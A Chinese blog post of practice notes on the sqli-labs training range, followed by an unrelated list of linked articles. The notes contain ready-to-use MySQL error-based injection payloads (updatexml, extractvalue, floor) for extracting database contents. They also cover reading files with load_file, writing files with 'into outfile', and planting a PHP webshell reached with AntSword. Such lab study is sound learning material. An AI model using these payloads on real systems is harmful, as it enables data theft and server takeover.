pipasound
pipasound

sql靶场练习笔记2

目录

环境:sqli靶场

Less-5 基于'字符型的错误回显注入

less-6 基于"字符型的错误回显注入

总结报错注入之updatexml语句:

总结报错注入之extractvalue语句: 

总结报错注入之floor语句: 

Less-7 文件读写注入

总结文件注入知识

一句话木马

环境:sqli靶场

Less-5 基于'字符型的错误回显注入

输入?id=1,页面正常  

输入?id=2',页面出现错误语句

尝试 ?id=1' order by 1,2,3 -- -   ,全是

sql靶场练习笔记2_第1张图片

说明页面没有显示位。无法使用联合查询注入 ,这里涉及一种新的知识:报错注入

?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

sql靶场练习笔记2_第2张图片

less-6 基于"字符型的错误回显注入

?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -

sql靶场练习笔记2_第3张图片

总结报错注入之updatexml语句:

语法:

payload:id='and(select(union select updatexml("anything",concat('~',(select语句())),"anyhing"))

例如:

'and(select updatexml(1,concat('~',(select database())),1))
'and(select updatexml(1,concat(0x7e,@@database),1)) 

针对mysql

爆数据库名:'and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名:'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名:'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据:'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

 注:

  •   0x7e=’~’
  •   concat(‘a’,‘b’)=“ab”
  •   database()=@@database
  •   ‘~‘可以换成’#’、’$'等不满足xpath格式的字符
  • 最长输出32位

总结报错注入之extractvalue语句: 

语法:

payload:id='and(select extractvalue("anything",concat('~',(select语句))))

例如

id='and(select extractvalue(1,concat('~',(select database()))))
id='and(select extractvalue(1,concat(0x7e,@@version)))

针对mysql:

查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))
  • 最长输出32位 

总结报错注入之floor语句: 

语法:

id=1' and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a) 

例如: 

floor():id=1’ and select count(*),(concat(floor(rand(0)*2),(select database())))x from users group by x --+  less-7 文件读写注入

第五题我们使用floor报错语句进行注入

?id=2' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 sql靶场练习笔记2_第4张图片

  • 这里发现页面提示我输出信息超过一行,但我们已经使用了group_concat函数,说明这里数据库名组成的字符串长度超过了64位,所以我们需要放弃group_concat函数,而使用limit 0,1来一个个输出
  • group_concat()函数的作用:将返回信息拼接成一行显示
  • limit 0,1  表示输出第一个数据。   0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)

接着我们运用如下语句:

?id=2' and (select 1 from (select count(*),concat(((select schema_name from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 sql靶场练习笔记2_第5张图片

 需要注意的是, 此时数据库名并不是 ctftraining1

这个1是floor报错语句中输出的也一部分(无论输出什么结果,都会有这个1)


Less-7 文件读写注入

这里我转入了自己的靶场,buuctf靶场解不出这道题

总结文件注入知识

一、读文件:

load_file()

以sqli- labs2为例

1.在E:/wamp64/tmp中写一个1.txt文件,并在里面写内容为“hello world!”。

 2,输入语句

这里注意:

  • 使用/来代替目录中的\ 
  • id一定要改成0或负数
?id=-1 union select 1,load_file('E:/wamp64/tmp/1.txt'),2

sql靶场练习笔记2_第6张图片

二、写文件:

into outfile()

以sqli- labs7为例 

写入sql语句,即可看到在E:/wamp64/tmp中出现了file.php文件

  • 数据库的file权限:规定了数据库用户是否有权限向操作系统内写入和读取已存在的权限
  • into outfile命令使用的环境:服务器上一个可以写入文件的文件夹的完整路径
?id=-1')) union select 1,2,3 into outfile 'E:/wamp64/tmp/file.php' --+

效果:

sql靶场练习笔记2_第7张图片

打开文件

sql靶场练习笔记2_第8张图片

三,这里有个坑,文件路径不是随便写的

sql靶场练习笔记2_第9张图片

打开my.ini  ,查看文件该放的路径--->

sql靶场练习笔记2_第10张图片

先试一试 ?id=1   页面回显正常

输入?id=1 and 1=2  页面仍回显正常

说明不是数值型注入

sql靶场练习笔记2_第11张图片

 输入?id=1'页面报错,说明可能存在"注入

依次次输入

  • ?id=1' --+ 页面显示异常
  • ?id=1') --+ 页面显示异常
  • ?id=1')) --+ 页面正常了

猜测注入语句

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

本关卡提示我们使用file权限向服务器写入文件,我们使用联合注入尝试写一下语句。这里我用的是wampserve环境

?id=-1')) union select 1,2,3 into outfile 'E:/wamp64/tmp/file.php' --+

sql靶场练习笔记2_第12张图片

需要注意的是利用数据库file权限向操作系统写入文件时, 对于相同文件名的文件不能覆盖,所以如果第一次上传file.php,下次在上传file.php,就是无效命令了,也就是新的file,php中的内容并不会覆盖之前的file.php 

一句话木马

我们再尝试上传一句话木马

文件上传--一句话木马详解

 

 

?id=-1')) union select 1,"",3 into outfile 'E:/wamp64/tmp/file2.php' -- -

sql靶场练习笔记2_第13张图片

将这个文件移到www目录下 

 sql靶场练习笔记2_第14张图片

上传成功,使用蚁剑连接木马

sql靶场练习笔记2_第15张图片

 连接成功

具体操作看这篇文章

你可能感兴趣的:(刷题记录,mysql学习笔记,sql,数据库,database)

  • MySQL无限极分类表设计:实战项目中的高效解决方案 MissYou-Coding mysql数据库
    在许多实战项目中,如电商系统、内容管理系统等,我们常常需要处理具有层级关系的数据,例如商品分类、文章栏目等。这些数据通常呈现出无限极分类的特点,即一个分类下可以有多个子分类,子分类下又可以有更深层次的子分类,层级关系复杂且不固定。下面将介绍一种适用于MySQL数据库的无限极分类表设计,并对其设计思路、优缺点进行详细分析,希望能为同行们提供一些有价值的参考。表结构设计我们设计的无限极分类表名为cat
  • mysql mvcc jie_1024 mysql
    mysqlMVCCMVVC实现:排他锁+undolog+版本事务链+一致性read-view视图+版本事务链匹配规则一致性非锁定读在InnoDB存储引擎中,多版本控制(multiversioning)openinnewwindow就是对非锁定读的实现。如果读取的行正在执行DELETE或UPDATE操作,这时读取操作不会去等待行上锁的释放。相反地,InnoDB存储引擎会去读取行的一个快照数据,对于这
  • python 清空表格_python 清空表数据库表 weixin_39989190 python清空表格
    《Greenplum5.0最佳实践》迁移数据使用Gptransfer使用Gptransfer命令迁移一个Greenplum数据库集群中的数据到另一台集群(metradata,data)gptransfer可以迁移数据库中的全部数据或者部分选择的表到另外一台Greenplum中。源数据库和目的数据库可以在同一个集群中,也可以在不同的集群中。gp...文章whatcat2017-11-194163浏览
  • 自强学堂mysql_Django ——自强学堂学习笔记 weixin_39792049 自强学堂mysql
    (一)、启动服务器E:\ScienceSoft\Python\Django\Django_project>pythonmanage.pyrunserver0.0.0.0:8000Performingsystemchecks...Systemcheckidentifiednoissues(0silenced).July22,2017-17:00:33Djangoversion1.11.3,using
  • python爬虫 django搜索修改更新数据_Django+python+BeautifulSoup垂直搜索爬虫 weixin_39897070 python爬虫django搜索修改更新数据
    使用python+BeautifulSoup完成爬虫抓取特定数据的工作,并使用Django搭建一个管理平台,用来协调抓取工作。因为自己很喜欢Djangoadmin后台,所以这次用这个后台对抓取到的链接进行管理,使我的爬虫可以应对各种后期的需求。比如分时段抓取,定期的对已经抓取的地址重新抓取。数据库是用python自带的sqlite3,所以很方便。这几天正好在做一个电影推荐系统,需要些电影数据。本文
  • mysql mvcc 并发update_MySQL——MVCC--多版本并发控制机制 瓦罗兰十字军 mysqlmvcc并发update
    前言以下的分析均在mysql的InnoDB引擎下。假设此时事务A与事务B同时执行。一、定义:MVCC(Multi-VersionConcurrencyControl,多版本并发控制)一种并发控制机制,在数据库中用来控制并发执行的事务,控制事务隔离进行。二、核心思想:MVCC是通过保存数据在某个时间点的快照来进行控制的。使用MVCC就是允许同一个数据记录拥有多个不同的版本。然后在查询时通过添加相对应
  • mysql mvcc与锁的关系_mysql四种隔离级别和mvcc以及锁之间的关系 夏至未至 mysqlmvcc与锁的关系
    什么是事务的隔离级别隔离级别:理解隔离级别之前需要先了解事务的四个特性,分别是:A(Atomic):原子性是指数据库的事务是一个不可分割的工作单位,只有数据库事务都成功才算成功,任何一个SQL的失败,数据库状态都必须回退到事务开始前的状态C(Consistence):一致性是指事务将数据库的状态从一种状态转变为下一个一致的状态。在事务的开始和结束后,数据库的完整性约束都没有被破坏。I(Isolat
  • mysql MVCC 秦淼 数据库javadatabase
    简介MVCC(Multi-VersionConcurrencyControl)即多版本并发控制。MVCC的实现原理我们在了解MVCC之前,首先先了解一下几个比较常见的锁。读锁:也叫共享锁、S锁,若事务T对数据对象A加上S锁,则事务T可以读A但不能修改A,其他事务只能再对A加S锁,而不能加X锁,直到T释放A上的S锁。这保证了其他事务可以读A,但在T释放A上的S锁之前不能对A做任何修改。写锁:又称排他
  • 【Node.js】Session原理详解 Peter-Lu #NodeJSnode.jsexpress前端npmjavascript
    文章目录一、Session机制概述1.什么是Session2.Session与Cookie的关系二、Session的工作流程1.基本流程2.示例代码三、Session的存储方式1.内存存储2.文件存储3.数据库存储Redis存储示例四、Session的生命周期1.Session过期时间2.手动销毁Session五、Session在分布式系统中的应用1.StickySession2.Session共
  • PG vs MySQL mvcc机制实现的异同 进击的CJR postgresqlmysqlmysql数据库
    MVCC实现方法比较MySQL写新数据时,把旧数据写入回滚段中,其他人读数据时,从回滚段中把旧的数据读出来PostgreSQL写新数据时,旧数据不删除,直接插入新数据。MVCC实现的原理PG的MVCC实现原理定义多版本的数据——使用元组头部信息的字段来标示元组的版本号定义数据的有效性、可见性、可更新性——通过当前的事务快照和对应元组的版本号判断实现不同的数据库隔离级别——通过在不同时机获取快照实现
  • Mysql远程连接的问题 2003 - Cant connect to MySQL server on 39.107.205.74 60 Operation timed out ❤ª゛ 欲ﻬ‘ Mysqliptablescentosmysql
    连接Mysql的问题时提示2003-Can’tconnecttoMySQLserveron‘39.107.205.74’(60“Operationtimedout”)上一篇文章中,cantconnecttoMySQLserveronip的问题讲到的是远程连接出现的另一个问题,与本文章参考使用2003-Can’tconnecttoMySQLserveron‘39.107.205.74’(60“Ope
  • php链接oracle乱码,尝试把一个php的项目转成java, slm311 java
    最近有个新需求,OA上的考勤信息确认,开始的时候搞了个php的版本,莫名其妙的数据库会乱码(oracle)(等有时间再写一篇php链接oracle数据库)折腾了将近一个周,乱码莫名其妙的出现,代码啥也不动,多请求两遍又正常了。准备搞个java来替换php,在gpt的协助下,搞成了。上代码连接数据库:privatestaticfinalStringDB_URL="jdbc:oracle:thin:@
  • spring-boot 整合 shardingsphere-jdbc、mybatis-plus 数据分片(文末有彩蛋) ゞ註﹎錠oo 架构之路mybatisspringbootspring数据库
    1.什么是ShardingSphere?ApacheShardingSphere是一款分布式的数据库生态系统,可以将任意数据库转换为分布式数据库,并通过数据分片、弹性伸缩、加密等能力对原有数据库进行增强。ApacheShardingSphere设计哲学为DatabasePlus,旨在构建异构数据库上层的标准和生态。它关注如何充分合理地利用数据库的计算和存储能力,而并非实现一个全新的数据库。它站在数
  • ShardingSphere 功能详细介绍 冰糖心158 数据库
    ShardingSphere是一个开源的分布式数据库中间件,旨在为数据库提供高可扩展性、可管理性和高可用性,支持数据的分库分表(Sharding)、数据库路由、数据同步等功能。ShardingSphere本质上是一个分布式数据库代理,它提供透明的分布式数据操作,使得应用程序可以像操作单一数据库一样操作分布式数据。ShardingSphere具有以下几个主要功能:1.分库分表(Sharding)Sh
  • (1064, “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server m0_74824483 sql数据库
    (1064,“YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear‘==‘1’’atline1”)这个错误是由于SQL查询语句中使用了错误的语法或者不被MySQL支持的语法所致。在SQL中,条件判断应该使用单个等号=,而不是双等号==
  • Shardingsphere-Proxy 5.5.0数据迁移 她又在丛中笑 shardingspherezookeeperjavaspringboot
    Shardingsphere-Proxy5.5.0数据迁移Shardingsphere系列目录:背景配置集群部署搭建Zookeeper修改shardingsphere-proxy配置重启shardingsphere-proxy执行数据迁移连接代理数据库实例(Navicate)应用代理数据库注册目标分片数据库存储单元注销目标分片数据库存储单元创建分库分表规则删除规则注册源数据库存储单元注销源数据库存
  • 最新java springboot druid shardingsphere 与shardingsphere-proxy读写分离 lgbisha springBootjavajavaspringboot数据库linux
    最新javaspringbootdruidshardingsphere读写分离公司又有新的项目,然后项目需求要求有数据库读写分离,这个需求倒也没什么问题,就是采用什么方式来解决网上调研了一堆方案,最后选择比较大众的解决方案用shardingsphere,但是呢这个shardingsphere也有两种,一种是java接入shardingsphere的jar包,然后进行配置来进行读写分离,还有一种是s
  • Spring Boot 中使用 ShardingSphere-Proxy 冰糖心158 数据库springboot后端java
    在SpringBoot中使用ShardingSphere-Proxy,与使用ShardingSphere-JDBC有所不同。ShardingSphere-Proxy作为独立的代理层,处理数据库分库分表、路由和负载均衡等功能,而应用程序通过JDBC连接到代理服务,而不是直接连接数据库。因此,集成ShardingSphere-Proxy的方式主要包括配置SpringBoot连接到ShardingSph
  • 基于Android 看点新闻系统(源码+LW+部署讲解+数据库+ppt) 西红柿计算机毕设 Android毕设数据库javaspringbootandroid-studio
    !!!!!!!!!选题不知道怎么选不清楚自己适合做哪块内容都可以免费来问我避免后期給自己答辩找麻烦增加难度(部分学校只有一次答辩机会没弄好就延迟毕业了)会持续一直更新下去有问必答一键收藏关注不迷路源码获取:https://pan.baidu.com/s/1aRpOv3f2sdtVYOogQjb8jg?pwd=jf1d提取码:jf1d!!!!!!!!!项目介绍基于Android看点新闻系统(源码+L
  • ubuntu20.04.6安装Intel AX211网卡驱动 2024.8 Harvey2001 Linux基础ubuntu20.04wifi驱动Linux
    前言环境电脑:thinkbook142024i5-13500HRTX3050网卡:IntelAX211Wi-Fi6系统内核:5.15安装#flex是一个词法分析器;#bison是一个语法分析器;#把两者联合使用可以实现对sql语言的解析。sudoaptinstallflexbison#从github上爬取软件包gitclonehttps://github.com/intel/backport-iw
  • sql查询中的包含【被包含】、模糊查询 大鳥 sql
    在mysql中提供了like的关键词可用于模糊查询,也可理解为某些指定字段包含在表中的的查询selectcount(*)frommysqlb_clientwherenamelike'%庆农%';可查询出在name字段下所有包含‘庆农’字样的记录;还有一种情况是我们查询的表中的字段被包含在我们指定的条件中,第一种方式我们可以使用关键词IN,配合where条件查询:selectcount(*)from
  • MongoDB 客户端工具(图) IT古董 Mongodbmongodb工具couchdb集群phpwindows
    转自:http://hi.baidu.com/shepherdnewage/blog/item/962368f05d1f427fdcc4747c.htmlhttp://www.javabloger.com/article/mongodb-gui-win-linux-mac.htmlNoSQL的运动不止,MongoDB作为其中的主力军发展迅猛,但是图形化工具少见,我在此做了一个简单的收集,如果将来有
  • 【Redis】为什么Redis单线程还这么快?通过什么机制进行优化的? 来一杯龙舌兰 数据库#Redisredis数据库缓存多路复用内存优化redis快
    文章目录纯内存操作高效的数据结构非阻塞I/O与多路复用技术(网络I/O优化)非CPU密集型任务单线程的优势单线程的劣势redis6.0引入多线程后台线程的优化总结更多相关内容可查看Redis的瓶颈在于内存和网络带宽纯内存操作Redis是一个内存数据库,它的数据都存储在内存中,这意味着我们读写数据都是在内存中完成,这个速度是非常快的可能有很多人只知道存内存更快,但是不知道原因内存:中每个存储单元都有
  • 基于Python大数据的王者荣耀战队数据分析及可视化系统 计算机学姐 大数据精选实战项目源码Python精选实战项目源码Vue源码1024程序员节python大数据数据分析数据挖掘djangovue.js
    作者:计算机学姐开发技术:SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等,“文末源码”。专栏推荐:前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码精品专栏:Java精选实战项目源码、Python精选实战项目源码、大数据精选实战项目源码系统展示【2025最新】基于大数据+大屏可视化+Python+D
  • 基于微信小程序的健身房预约管理系统 计算机学姐 微信小程序源码微信小程序小程序springbootvue.jsjavamysql后端
    作者:计算机学姐开发技术:SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等,“文末源码”。专栏推荐:前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码精品专栏:Java精选实战项目源码、Python精选实战项目源码、大数据精选实战项目源码系统展示基于微信小程序+Java+SpringBoot+Vue+
  • O2O同城系统架构与功能分析 商鼎云技术 源码自研产品O2O同城同城系统
    2015工作至今,10年资深全栈工程师,CTO,擅长带团队、攻克各种技术难题、研发各类软件产品,我的代码态度:代码虐我千百遍,我待代码如初恋,我的工作态度:极致,责任,死磕!欢迎点赞、收藏、关注,更多分享请进我主页。一、系统架构服务端:Java(最低JDK1.8,支持JDK11以及JDK17)数据库:MySQL数据库(标配5.7版本,支持MySQL8)ORM框架:Mybatis(集成通用tk-ma
  • 10秒教会你mysql的连接 m0_74823933 mysqladb数据库
    连接MySQL数据库通常可以通过多种方法实现,以下是几种常见的方法,我将按照您的要求以清晰、分点的方式归纳说明:1.使用MySQL命令行客户端打开终端或命令提示符:首先,打开您的计算机上的终端或命令提示符窗口。输入连接命令:在命令行中输入以下格式的命令:bash复制代码mysql-u[用户名]-p将[用户名]替换为您的MySQL用户名。输入密码:按Enter键后,系统会提示您输入密码。输入密码(注
  • 分布式锁的实现,基于Redis实现分布式锁 轻浮j Redis分布式redis数据库
    分布式锁的实现,基于Redis实现分布式锁前言基于mysql实现分布式锁基于Reids实现分布式锁基于Redis的具体实现问题1:线程误删锁解决方案一:在删除锁时进行校验问题2:释放锁的检验和释放不具有原子性解决方案:基于lua脚本使检验和删除操作具有原子性其他问题前言对于一些业务来说,比如商品或者优惠卷的抢杀,我们常常需要进行一些加锁的操作比如synchronized等来避免商品的超卖问题,但是
  • 做商城系统,是选择SaaS还是源码? hunzi_1 运维
    做商城系统时,选择SaaS还是源码各有优劣,需要综合考虑多个因素,以下是详细的对比分析:成本方面SaaS:前期投入成本低,通常以订阅模式付费,一般每月几百元到数千元不等,具体取决于功能和使用规模。无需承担服务器运维、软件升级等额外成本,适合预算有限、不想投入过多资金进行技术建设的中小企业。源码:一次性购买源码费用可能较高,从数万元到数十万元都有可能,还需自行搭建服务器、数据库等基础设施,加上后续运
  • 搭建商城系统有可能运用到什么技术 hunzi_1 微信小程序小程序
    搭建商城系统涉及多种技术,涵盖前端、后端和数据库等多个方面:一、前端技术HTML(超文本标记语言)这是构建网页的基础语言,用于定义页面的结构。在商城系统中,通过HTML可以创建商品展示页面、购物车页面、用户注册登录页面等的基本框架。例如,使用标签来划分页面的不同区域,如商品图片展示区、商品描述区、购买按钮区域等;用标签来显示商品图片,通过设置其src属性来指定图片的来源路径。CSS(层叠样式表)用
  • Java开发中,spring mvc 的线程怎么调用? 小麦麦子 springmvc
    今天逛知乎,看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题,觉得挺有意思的,那哥们儿问的也听仔细,下面的回答也很详尽,分享出来,希望遇对遇到类似问题的Java开发程序猿有所帮助。 问题:     在用spring mvc架构的网站上,设一线程在虚拟机启动时运行,线程里有一全局
  • maven依赖范围 bitcarter maven
    1.test 测试的时候才会依赖,编译和打包不依赖,如junit不被打包 2.compile 只有编译和打包时才会依赖 3.provided 编译和测试的时候依赖,打包不依赖,如:tomcat的一些公用jar包 4.runtime 运行时依赖,编译不依赖 5.默认compile 依赖范围compile是支持传递的,test不支持传递 1.传递的意思是项目A,引用
  • Jaxb org.xml.sax.saxparseexception : premature end of file darrenzhu xmlprematureJAXB
    如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误: org.xml.sax.saxparseexception : premature end of file 很有可能时你直接读取文件为inputstream,然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
  • CSS Specificity 周凡杨 html权重Specificitycss
      有时候对于页面元素设置了样式,可为什么页面的显示没有匹配上呢? because specificity CSS 的选择符是有权重的,当不同的选择符的样式设置有冲突时,浏览器会采用权重高的选择符设置的样式。     规则:   HTML标签的权重是1 Class 的权重是10 Id 的权重是100
  • java与servlet g21121 servlet
    servlet 搞java web开发的人一定不会陌生,而且大家还会时常用到它。 下面是java官方网站上对servlet的介绍: java官网对于servlet的解释 写道 Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
  • eclipse中安装maven插件 510888780 eclipsemaven
    1.首先去官网下载 Maven: http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz 下载完成之后将其解压, 我将解压后的文件夹:apache-maven-3.2.3, 并将它放在 D:\tools目录下, 即 maven 最终的路径是:D:\tools\apache-mave
  • jpa@OneToOne关联关系 布衣凌宇 jpa
    Nruser里的pruserid关联到Pruser的主键id,实现对一个表的增删改,另一个表的数据随之增删改。 Nruser实体类 //***************************************************************** @Entity @Table(name="nruser") @DynamicInsert @Dynam
  • 我的spring学习笔记11-Spring中关于声明式事务的配置 aijuans spring事务配置
    这两天学到事务管理这一块,结合到之前的terasoluna框架,觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容,对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种,我承认后两种的内容很好,很强大。但是实际的项目当中
  • java 动态代理简单实现 antlove javahandlerproxydynamicservice
    dynamicproxy.service.HelloService package dynamicproxy.service; public interface HelloService { public void sayHello(); }   dynamicproxy.service.impl.HelloServiceImpl package dynamicp
  • JDBC连接数据库 百合不是茶 JDBC编程JAVA操作oracle数据库
             如果我们要想连接oracle公司的数据库,就要首先下载oralce公司的驱动程序,将这个驱动程序的jar包导入到我们工程中;   JDBC链接数据库的代码和固定写法;     1,加载oracle数据库的驱动;     &nb
  • 单例模式中的多线程分析 bijian1013 javathread多线程java多线程
    谈到单例模式,我们立马会想到饿汉式和懒汉式加载,所谓饿汉式就是在创建类时就创建好了实例,懒汉式在获取实例时才去创建实例,即延迟加载。 饿汉式: package com.bijian.study; public class Singleton { private Singleton() { } // 注意这是private 只供内部调用 private static
  • javascript读取和修改原型特别需要注意原型的读写不具有对等性 bijian1013 JavaScriptprototype
            对于从原型对象继承而来的成员,其读和写具有内在的不对等性。比如有一个对象A,假设它的原型对象是B,B的原型对象是null。如果我们需要读取A对象的name属性值,那么JS会优先在A中查找,如果找到了name属性那么就返回;如果A中没有name属性,那么就到原型B中查找name,如果找到了就返回;如果原型B中也没有
  • 【持久化框架MyBatis3六】MyBatis3集成第三方DataSource bit1129 dataSource
    MyBatis内置了数据源的支持,如:   <environments default="development"> <environment id="development"> <transactionManager type="JDBC" /> <data
  • 我程序中用到的urldecode和base64decode,MD5 bitcarter cMD5base64decodeurldecode
    这里是base64decode和urldecode,Md5在附件中。因为我是在后台所以需要解码: string Base64Decode(const char* Data,int DataByte,int& OutByte) { //解码表 const char DecodeTable[] = { 0, 0, 0, 0, 0, 0
  • 腾讯资深运维专家周小军:QQ与微信架构的惊天秘密 ronin47
    社交领域一直是互联网创业的大热门,从PC到移动端,从OICQ、MSN到QQ。到了移动互联网时代,社交领域应用开始彻底爆发,直奔黄金期。腾讯在过去几年里,社交平台更是火到爆,QQ和微信坐拥几亿的粉丝,QQ空间和朋友圈各种刷屏,写心得,晒照片,秀视频,那么谁来为企鹅保驾护航呢?支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢?本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
  • java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素 bylijinnan java
    public class MinOfShiftedArray { /** * Q69 旋转数组的最小元素 * 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素。 * 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转,该数组的最小值为1。 */ publ
  • 看博客,应该是有方向的 Cb123456 反省看博客
    看博客,应该是有方向的:  我现在就复习以前的,在补补以前不会的,现在还不会的,同时完善完善项目,也看看别人的博客.  我刚突然想到的:  1.应该看计算机组成原理,数据结构,一些算法,还有关于android,java的。  2.对于我,也快大四了,看一些职业规划的,以及一些学习的经验,看看别人的工作总结的.    为什么要写
  • [开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖 comsci 开源项目
         为什么这样说呢?  因为科学和技术的发展有时候需要一个平缓和长期的积累过程,但是行政和商业体系本身充满各种不稳定性和不确定性,如果你希望长期从事某个科研项目,但是却又必须依赖于某种行政和商业体系,那其中的过程必定充满各种风险。。。       所以,为避免这种不确定性风险,我
  • 一个 sql优化 ([精华] 一个查询优化的分析调整全过程!很值得一看 ) cwqcwqmax9 sql
    见   http://www.itpub.net/forum.php?mod=viewthread&tid=239011 Web翻页优化实例 提交时间: 2004-6-18 15:37:49      回复    发消息  环境: Linux ve
  • Hibernat and Ibatis dashuaifu Hibernateibatis
    Hibernate  VS  iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架,当前版本是3.05。它出身于sf.net,现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架,当前版本是2.0。目前属于apache的一个子项目了。 相对Hibernate“O/R”而言,iBATIS 是一种“Sql Mappi
  • 备份MYSQL脚本 dcj3sjt126com mysql
    #!/bin/sh # this shell to backup mysql #[email protected] (QQ:1413161683 DuChengJiu) _dbDir=/var/lib/mysql/ _today=`date +%w` _bakDir=/usr/backup/$_today [ ! -d $_bakDir ] && mkdir -p
  • iOS第三方开源库的吐槽和备忘 dcj3sjt126com ios
    转自 ibireme的博客   做iOS开发总会接触到一些第三方库,这里整理一下,做一些吐槽。   目前比较活跃的社区仍旧是Github,除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流,这里主要介绍一下Github里面流行的iOS库。   首先整理了一份 Github上排名靠
  • html wlwmanifest.xml eoems htmlxml
    所谓优化wp_head()就是把从wp_head中移除不需要元素,同时也可以加快速度。 步骤: 加入到function.php remove_action('wp_head', 'wp_generator'); //wp-generator移除wordpress的版本号,本身blog的版本号没什么意义,但是如果让恶意玩家看到,可能会用官网公布的漏洞攻击blog remov
  • 浅谈Java定时器发展 hacksin java并发timer定时器
    java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor,从后者的表现来看,可以考虑完全替代Timer了。 Timer与ScheduleThreadPoolExecutor对比: 1.    Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
  • 移动端页面侧边导航滑入效果 ini jqueryWebhtml5cssjavascirpt
    效果体验:http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js,该版本的jQuery库是用于支持HTML5的浏览器上,不再兼容IE8以前的浏览器,现在移动端浏览器一般都支持HTML5,所以使用该jQuery没问题。HTML文件代码: <!DOCTYPE html> <h
  • AspectJ+Javasist记录日志 kane_xie aspectjjavasist
    在项目中碰到这样一个需求,对一个服务类的每一个方法,在方法开始和结束的时候分别记录一条日志,内容包括方法名,参数名+参数值以及方法执行的时间。   @Override public String get(String key) { // long start = System.currentTimeMillis(); // System.out.println("Be
  • redis学习笔记 MJC410621 redisNoSQL
    1)nosql数据库主要由以下特点:非关系型的、分布式的、开源的、水平可扩展的。 1,处理超大量的数据 2,运行在便宜的PC服务器集群上, 3,击碎了性能瓶颈。 1)对数据高并发读写。 2)对海量数据的高效率存储和访问。 3)对数据的高扩展性和高可用性。 redis支持的类型: Sring 类型 set name lijie get name lijie set na
  • 使用redis实现分布式锁 qifeifei
    在多节点的系统中,如何实现分布式锁机制,其中用redis来实现是很好的方法之一,我们先来看一下jedis包中,有个类名BinaryJedis,它有个方法如下:   public Long setnx(final byte[] key, final byte[] value) { checkIsInMulti(); client.setnx(key, value); ret
  • BI并非万能,中层业务管理报表要另辟蹊径 张老师的菜 大数据BI商业智能信息化
           BI是商业智能的缩写,是可以帮助企业做出明智的业务经营决策的工具,其数据来源于各个业务系统,如ERP、CRM、SCM、进销存、HER、OA等。        BI系统不同于传统的管理信息系统,他号称是一个整体应用的解决方案,是融入管理思想的强大系统:有着系统整体的设计思想,支持对所有
  • 安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题 wudixiaotie function
    1.在~/.bashrc最后加入 [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"  2.重新启动terminal输入:   rvm use ruby-2.2.1 --default  把当前安装的ruby版本设为默
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他